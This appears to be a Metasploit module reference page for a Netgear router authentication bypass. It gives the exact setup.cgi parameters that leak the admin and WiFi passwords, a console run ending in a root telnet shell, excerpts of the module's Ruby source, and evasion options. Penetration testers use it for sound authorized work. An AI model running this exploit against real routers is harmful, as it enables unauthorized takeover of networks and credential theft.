Netgear PNPX_GetShareFolderList Authentication Bypass - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Netgear PNPX_GetShareFolderList Authentication Bypass
Module: auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
Source code: modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
Disclosure date: 2021-09-06
Last modification time: 2022-10-03 19:50:04 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -
This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows unauthenticated attackers to reveal the password for the admin user that is used to log into the router's administrative portal, in plaintext. Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the admin user. This will result in the attacker obtaining a new telnet session as the "root" user. This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > show targets
... a list of targets ...
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > set TARGET target-id
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > show options
... show and set options ...
msf auxiliary(netgear_pnpx_getsharefolderlist_auth_bypass) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Intro
This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers
running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84.
Specifically, a call to strstr() is used to check if any incoming requests to authenticated pages contain
the string todo=PNPX_GetShareFolderList anywhere within the request. If this string is found anywhere within
the request, the request will be marked as an authenticated request, and will be treated as though it came from
a logged in administrative user.
By using this vulnerability to send a request to /setup.cgi with the next_file GET parameter set to BRS_swisscom_success.html
and a x GET parameter set to todo=PNPX_GetShareFolderList, an unauthenticated attacker can leak the plaintext versions of
all of the router's WiFi passwords, as well as the admin username and plaintext admin password for the router.
Once the password has been been obtained, the exploit enables telnet on the target router by sending a request to setup.cgi
with the todo GET parameter set to debug. Once telnet has been enabled, it then utilizes the
auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the
admin user. This will result in the attacker obtaining a new telnet session as the root user.
This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
Affected Versions
- AC2100 prior to firmware version 1.2.0.88
- AC2400 prior to firmware version 1.2.0.88
- AC2600 prior to firmware version 1.2.0.88
- D7000 prior to firmware version 1.0.1.80
- R6220 prior to firmware version 1.1.0.110
- R6230 prior to firmware version 1.1.0.110
- R6260 prior to firmware version 1.1.0.84
- R6330 prior to firmware version 1.1.0.84
- R6350 prior to firmware version 1.1.0.84
- R6700v2 prior to firmware version 1.2.0.88
- R6800 prior to firmware version 1.2.0.88
- R6850 prior to firmware version 1.1.0.84
- R6900v2 prior to firmware version 1.2.0.88
- R7200 prior to firmware version 1.2.0.88
- R7350 prior to firmware version 1.2.0.88
- R7400 prior to firmware version 1.2.0.88
- R7450 prior to firmware version 1.2.0.88
- Start msfconsole
- Do:
use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass - Do:
set RHOSTS <RouterIP> - Do:
exploit - Verify that you get a new telnet shell as the
rootuser on the target router.
Verification Steps
Scenarios
Netgear AC1600 aka R6260 with Firmware Version 1.1.0.40_1.0.1
msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > check
[*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
[*] 192.168.1.1:80 - The target appears to be vulnerable.
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > exploit
[*] Running module against 192.168.1.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is a R6260 router running firmware version 1.1.0.40_1.0.1
[+] The target appears to be vulnerable.
[*] Attempting to leak the password of the admin user...
[+] Can log into target router using username admin and password theRiverOfNope123!
[*] Attempting to retrieve /top.html to verify we are logged in!
[*] Sending one request to grab authorization cookie from headers...
[*] Got the authentication cookie, associating it with a logged in session...
[+] Successfully logged into target router using the stolen credentials!
[*] Attempting to store the stolen admin credentials for future use...
[*] Enabling telnet on the target router...
[+] Telnet enabled on target router!
[*] Attempting to log in with admin:theRiverOfNope123!. You should get a new telnet session as the root user
[*] Command shell session 1 opened (192.168.224.128:45717 -> 192.168.1.1:23) at 2021-09-23 16:38:53 -0500
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > sessions -i 1
[*] Starting interaction with 1...
# uname -a
uname -a
Linux R6260 2.6.36 #7 SMP Fri Jul 20 17:14:50 CST 2018 mips unknown
# busybox
busybox
BusyBox v1.12.1 (2018-07-18 20:59:15 CST) multi-call binary
Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko
and others. Licensed under GPLv2.
See source distribution for full notice.
Usage: busybox [function] [arguments]...
or: function [arguments]...
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as!
Currently defined functions:
[, [[, arp, ash, awk, basename, bunzip2, bzcat, cat, chmod, chpasswd,
cp, cut, date, dd, df, dmesg, echo, expr, false, fdisk, find, free,
ftpget, grep, gzip, halt, head, hexdump, hostname, ifconfig, init,
init, insmod, kill, killall, ln, login, ls, lsmod, md5sum, mdev,
mkdir, mknod, more, mount, mv, netstat, nice, passwd, pidof, ping,
ping6, poweroff, ps, pwd, reboot, renice, rm, rmmod, route, sed,
seq, sh, sleep, sync, tail, tar, taskset, telnetd, test, tftp,
time, top, touch, tr, traceroute, true, umount, uname, unzip, vconfig,
vi, wc, wget
#
Go back to menu.
Msfconsole Usage
Here is how the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show info
Name: Netgear PNPX_GetShareFolderList Authentication Bypass
Module: auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-09-06
Provided by:
Unknown
Grant Willcox
Module side effects:
config-changes
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Description:
This module targets an authentication bypass vulnerability in the
mini_http binary of several Netgear Routers running firmware
versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The
vulnerability allows unauthenticated attackers to reveal the
password for the admin user that is used to log into the router's
administrative portal, in plaintext. Once the password has been been
obtained, the exploit enables telnet on the target router and then
utiltizes the auxiliary/scanner/telnet/telnet_login module to log
into the router using the stolen credentials of the admin user. This
will result in the attacker obtaining a new telnet session as the
"root" user. This vulnerability was discovered and exploited by an
independent security researcher who reported it to SSD.
References:
https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133
https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/
Module Options
This is a complete list of options available in the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module:
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show options
Module options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module:
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show advanced
Module advanced options (auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-
IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Wind no The User-Agent header to use for all requests
ows NT 5.1)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass module can do:
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/netgear_pnpx_getsharefolderlist_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/netgear_pnpx_getsharefolderlist_auth_bypass) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache
)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-n
ormal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Connection timed out.
- Target does not appear to be a Netgear router!
- Connection timed out.
- Could not retrieve firmware version!
- Could not retrieve model of the router!
- Not a vulnerable router model!
- Not a vulnerable router version!
- Application did not respond with the expected admin username in its response!
- Application did not respond with an SSID in its response!
- Application did not respond with an 5G SSID in its response!
- 5G SSID information contained blank strings, skipping saving this info to the database!
- SSID information contained blank strings, skipping saving this info to the database!
- Application responded with expected content, but the matched content was an empty string for some reason!
- Could not reach the target, something may have happened mid attempt!
- Router didn't respond with the expected Set-Cookie header to a response to /top.html!
- Could not reach the target, something may have happened mid attempt!
- The target router did not respond with a firmware version when /top.html was requested. Are we logged in?
- Could not reach the target, something may have happened mid attempt!
- Target did not enable debug mode for some reason!
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Connection timed out.
Here is a relevant code snippet related to the "Connection timed out." error message:
53: 'uri' => '/top.html',
54: 'method' => 'GET'
55: )
56:
57: if res.nil?
58: return Exploit::CheckCode::Unknown('Connection timed out.')
59: end
60:
61: unless res.headers['WWW-Authenticate'] =~ /netgear/i
62: return Exploit::CheckCode::Safe('Target does not appear to be a Netgear router!')
63: end
Target does not appear to be a Netgear router!
Here is a relevant code snippet related to the "Target does not appear to be a Netgear router!" error message:
57: if res.nil?
58: return Exploit::CheckCode::Unknown('Connection timed out.')
59: end
60:
61: unless res.headers['WWW-Authenticate'] =~ /netgear/i
62: return Exploit::CheckCode::Safe('Target does not appear to be a Netgear router!')
63: end
64:
65: # Retrieve model name and firmware version
66: res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
67: if res.nil?
Connection timed out.
Here is a relevant code snippet related to the "Connection timed out." error message:
63: end
64:
65: # Retrieve model name and firmware version
66: res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
67: if res.nil?
68: return Exploit::CheckCode::Unknown('Connection timed out.')
69: end
70:
71: data = res.to_s
72: firmware_version = data.match(/^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/)
73: if firmware_version.nil?
Could not retrieve firmware version!
Here is a relevant code snippet related to the "Could not retrieve firmware version!" error message:
69: end
70:
71: data = res.to_s
72: firmware_version = data.match(/^Firmware=V(\d+\.\d+\.\d+\.\d+)_(\d+\.\d+\.\d+)/)
73: if firmware_version.nil?
74: return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
75: end
76:
77: major_version = firmware_version[1]
78: minor_version = firmware_version[2]
79:
Could not retrieve model of the router!
Here is a relevant code snippet related to the "Could not retrieve model of the router!" error message:
77: major_version = firmware_version[1]
78: minor_version = firmware_version[2]
79:
80: model_name = data.match(/Model=([a-zA-Z0-9]+)/)
81: if model_name.nil?
82: return Exploit::CheckCode::Unknown('Could not retrieve model of the router!')
83: end
84:
85: model_name = model_name[1]
86:
87: # Check model is actually vulnerable
Not a vulnerable router model!
Here is a relevant code snippet related to the "Not a vulnerable router model!" error message:
85: model_name = model_name[1]
86:
87: # Check model is actually vulnerable
88: vulnerable_router_models = ['AC2100', 'AC2400', 'AC2600', 'D7000', 'R6220', 'R6230', 'R6260', 'R6330', 'R6350', 'R6700v2', 'R6800', 'R6850', 'R6900v2', 'R7200', 'R7350', 'R7400', 'R7450']
89: unless vulnerable_router_models.include?(model_name)
90: return Exploit::CheckCode::Safe('Not a vulnerable router model!')
91: end
92:
93: # Check version is vulnerable
94: print_status("Target is a #{model_name} router running firmware version #{major_version}_#{minor_version}")
95: if (Rex::Version.new(major_version) >= Rex::Version.new('1.2.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.2.0.88'))
Not a vulnerable router version!
Here is a relevant code snippet related to the "Not a vulnerable router version!" error message:
99: elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
100: return Exploit::CheckCode::Appears
101: elsif (Rex::Version.new(major_version) >= Rex::Version.new('1.1.0.0')) && (Rex::Version.new(major_version) < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
102: return Exploit::CheckCode::Appears
103: else
104: return Exploit::CheckCode::Safe('Not a vulnerable router version!')
105: end
106: end
107:
108: def run
109: print_status('Attempting to leak the password of the admin user...')
Application did not respond with the expected admin username in its response!
Here is a relevant code snippet related to the "Application did not respond with the expected admin username in its response!" error message:
118:
119: html_response = res.get_html_document
120: leaked_info_array = []
121: html_response.xpath('//div[@id="passpharse"]/following-sibling::div[@class="right_div"]').map { |node| leaked_info_array << node.text }
122: unless leaked_info_array.include?('admin')
123: fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
124: end
125: wifi_password = leaked_info_array[0]
126: wifi_password_5g = leaked_info_array[1]
127: username = leaked_info_array[2]
128: password = leaked_info_array[3]
Application did not respond with an SSID in its response!
Here is a relevant code snippet related to the "Application did not respond with an SSID in its response!" error message:
127: username = leaked_info_array[2]
128: password = leaked_info_array[3]
129:
130: network_names = html_response.xpath('//div[@id="network_name"]/following-sibling::div[@class="right_div"]')
131: if network_names.length < 2
132: print_warning('Application did not respond with an SSID in its response!')
133: else
134: wifi_ssid = network_names[1].text
135: end
136:
137: network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')
Application did not respond with an 5G SSID in its response!
Here is a relevant code snippet related to the "Application did not respond with an 5G SSID in its response!" error message:
134: wifi_ssid = network_names[1].text
135: end
136:
137: network_names_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()')
138: if network_names_5g.empty?
139: print_warning('Application did not respond with an 5G SSID in its response!')
140: else
141: wifi_ssid_5g = network_names_5g.text
142: end
143:
144: if wifi_ssid_5g.empty? || wifi_password_5g.empty?
5G SSID information contained blank strings, skipping saving this info to the database!
Here is a relevant code snippet related to the "5G SSID information contained blank strings, skipping saving this info to the database!" error message:
140: else
141: wifi_ssid_5g = network_names_5g.text
142: end
143:
144: if wifi_ssid_5g.empty? || wifi_password_5g.empty?
145: print_warning('5G SSID information contained blank strings, skipping saving this info to the database!')
146: else
147: # Create 5G WiFi credential
148: wifi_data_5g = {
149: origin_type: :import,
150: address: datastore['RHOST'],
SSID information contained blank strings, skipping saving this info to the database!
Here is a relevant code snippet related to the "SSID information contained blank strings, skipping saving this info to the database!" error message:
157: }
158: create_credential(wifi_data_5g)
159: end
160:
161: if wifi_ssid.empty? || wifi_password.empty?
162: print_warning('SSID information contained blank strings, skipping saving this info to the database!')
163: else
164: # Create regular WiFi credential
165: wifi_data = {
166: origin_type: :import,
167: address: datastore['RHOST'],
Application responded with expected content, but the matched content was an empty string for some reason!
Here is a relevant code snippet related to the "Application responded with expected content, but the matched content was an empty string for some reason!" error message:
174: }
175: create_credential(wifi_data)
176: end
177:
178: if username.empty? || password.empty?
179: fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
180: end
181:
182: print_good("Can log into target router using username #{username} and password #{password}")
183:
184: print_status('Attempting to retrieve /top.html to verify we are logged in!')
Could not reach the target, something may have happened mid attempt!
Here is a relevant code snippet related to the "Could not reach the target, something may have happened mid attempt!" error message:
190: 'method' => 'GET',
191: 'keep_cookies' => 'true'
192: )
193:
194: if res.nil?
195: fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
196: end
197:
198: if cookie_jar.empty?
199: fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
200: end
Router didn't respond with the expected Set-Cookie header to a response to /top.html!
Here is a relevant code snippet related to the "Router didn't respond with the expected Set-Cookie header to a response to /top.html!" error message:
194: if res.nil?
195: fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
196: end
197:
198: if cookie_jar.empty?
199: fail_with(Failure::UnexpectedReply, "Router didn't respond with the expected Set-Cookie header to a response to /top.html!")
200: end
201:
202: print_status('Got the authentication cookie, associating it with a logged in session...')
203: res = send_request_cgi(
204: 'uri' => '/top.html',
Could not reach the target, something may have happened mid attempt!
Here is a relevant code snippet related to the "Could not reach the target, something may have happened mid attempt!" error message:
205: 'method' => 'GET',
206: 'authorization' => basic_auth(username, password)
207: )
208:
209: if res.nil?
210: fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
211: end
212:
213: result = res.get_html_document
214: if result.xpath("//div[@id='firm_version']/text()").empty? # Find all div tags with an "id" attribute named "firm_version" and find its text value.
215: fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
The target router did not respond with a firmware version when /top.html was requested. Are we logged in?
Here is a relevant code snippet related to the "The target router did not respond with a firmware version when /top.html was requested. Are we logged in?" error message:
210: fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
211: end
212:
213: result = res.get_html_document
214: if result.xpath("//div[@id='firm_version']/text()").empty? # Find all div tags with an "id" attribute named "firm_version" and find its text value.
215: fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
216: end
217:
218: print_good('Successfully logged into target router using the stolen credentials!')
219: print_status('Attempting to store the stolen admin credentials for future use...')
220:
Could not reach the target, something may have happened mid attempt!
Here is a relevant code snippet related to the "Could not reach the target, something may have happened mid attempt!" error message:
230: },
231: 'authorization' => basic_auth(username, password)
232: )
233:
234: if res.nil?
235: fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
236: end
237:
238: unless res.body.include?('Debug Enable!')
239: fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
240: end
Target did not enable debug mode for some reason!
Here is a relevant code snippet related to the "Target did not enable debug mode for some reason!" error message:
234: if res.nil?
235: fail_with(Failure::Unreachable, 'Could not reach the target, something may have happened mid attempt!')
236: end
237:
238: unless res.body.include?('Debug Enable!')
239: fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
240: end
241: print_good('Telnet enabled on target router!')
242: handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
243: handler.datastore['RHOSTS'] = datastore['RHOST']
244: File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Make sure the file is deleted if it already exists.
Go back to menu.
Related Pull Requests
- #15729 Merged Pull Request: Add nil check for return value of add_printer_driver_ex in cve_2021_1675_printnightmare to prevent errors when status code can't be mapped
- #15726 Merged Pull Request: Add MeterpreterTryToFork to the mettle payloads
- #15721 Merged Pull Request: Support Pivoted SSL Connections
- #15722 Merged Pull Request: Add tab completion for exploit rerun command
- #15720 Merged Pull Request: Fix #15717, replacing 'RHOSTS' with 'rhost'
- #15719 Merged Pull Request: Update payloads version to 2.0.58
- #15707 Merged Pull Request: Add ECU Hard Reset for hwbridge
- #15200 Merged Pull Request: PackRat post exploitation modules based on a common mixin
- #15703 Merged Pull Request: Fix Compiling Encrypted Payloads on MacOS
References
- CVE: Not available
- https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133
- https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/netgear_auth_download
- auxiliary/admin/http/netgear_r6700_pass_reset
- auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce
- auxiliary/admin/http/netgear_soap_password_extractor
- auxiliary/admin/http/netgear_wnr2000_pass_recovery
- auxiliary/gather/netgear_password_disclosure
- auxiliary/scanner/http/netgear_sph200d_traversal
- exploit/linux/http/netgear_dgn1000b_setup_exec
- exploit/linux/http/netgear_dgn1000_setup_unauth_exec
- exploit/linux/http/netgear_dgn2200b_pppoe_exec
- exploit/linux/http/netgear_dnslookup_cmd_exec
- exploit/linux/http/netgear_r7000_cgibin_exec
- exploit/linux/http/netgear_readynas_exec
- exploit/linux/http/netgear_unauth_exec
- exploit/linux/http/netgear_wnr2000_rce
- exploit/linux/telnet/netgear_telnetenable
- exploit/windows/http/netgear_nms_rce
- auxiliary/admin/http/allegro_rompager_auth_bypass
- auxiliary/admin/http/grafana_auth_bypass
- auxiliary/admin/http/iis_auth_bypass
- auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
- auxiliary/admin/networking/cisco_dcnm_auth_bypass
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/admin/vnc/realvnc_41_bypass
- auxiliary/gather/samsung_browser_sop_bypass
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/dir_webdav_unicode_bypass
- auxiliary/scanner/http/intel_amt_digest_bypass
- auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
- auxiliary/scanner/http/rewrite_proxy_bypass
- auxiliary/scanner/http/verb_auth_bypass
- auxiliary/scanner/misc/dahua_dvr_auth_bypass
- auxiliary/scanner/ssh/libssh_auth_bypass
Authors
- Unknown
- Grant Willcox
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
